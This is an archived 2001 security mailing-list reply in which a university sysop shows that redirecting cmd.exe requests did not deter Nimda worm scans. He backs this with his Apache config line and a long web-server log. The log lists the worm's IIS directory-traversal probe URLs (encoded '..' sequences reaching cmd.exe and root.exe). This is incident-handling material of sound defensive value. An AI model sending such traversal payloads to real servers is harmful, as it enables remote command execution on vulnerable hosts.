Security Incidents mailing list archives
Re: Tracking down the still infected hosts
From: Neil Dickey <neil () geol niu edu>
Date: Tue, 25 Sep 2001 13:58:29 -0500 (CDT)
Tina Bird <tbird () precision-guesswork com> wrote:
Can I ask a question? According to Ryan Russell (who's been analyzing the worm code), Nimda doesn't honor redirects - it just checks the response it gets from a Web server to determine whether or not the server is vulnerable. It doesn't follow redirects. So what does this actually accomplish?
In my experience this is correct. I implemented the redirect this morning ( 09:00 ), and just got an extended scan ( 162 hits ) from a source which appeared to be completely unaffected by the new setting. Evidence provided below. Best regards, Neil Dickey, Ph.D. Research Associate/Sysop Geology Department Northern Illinois University DeKalb, Illinois 60115 ------------------------------------------------------------------ Here's the line in the configuration file ... RedirectMatch (.*)\cmd.exe$ http://127.0.0.1 ... and here's the log trace: hs090.fau.edu - - [25/Sep/2001:13:15:21 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 hs090.fau.edu - - [25/Sep/2001:13:15:21 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 hs090.fau.edu - - [25/Sep/2001:13:15:22 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:28 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system 32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:55 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 hs090.fau.edu - - [25/Sep/2001:13:15:55 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system 32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:56 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:56 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 hs090.fau.edu - - [25/Sep/2001:13:15:59 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:59 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 hs090.fau.edu - - [25/Sep/2001:13:16:01 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:16:01 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:16:03 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Re: Tracking down the still infected hosts, (continued)
- Re: Tracking down the still infected hosts Kyle R. Hofmann (Sep 25)
- Re: Tracking down the still infected hosts Tina Bird (Sep 25)
- Re: Tracking down the still infected hosts Skip Carter (Sep 25)
- Re: Tracking down the still infected hosts Kyle R. Hofmann (Sep 25)
- Re: Tracking down the still infected hosts Dale Lancaster (Sep 25)
- Re: Tracking down the still infected hosts Duncan Hill (Sep 25)
- Re: Tracking down the still infected hosts Josh Burroughs (Sep 25)
- Message not available
- Re: Tracking down the still infected hosts Nicole Haywood (Sep 25)
- Re: Tracking down the still infected hosts Kyle R. Hofmann (Sep 25)
- Re: Tracking down the still infected hosts Ryan Russell (Sep 25)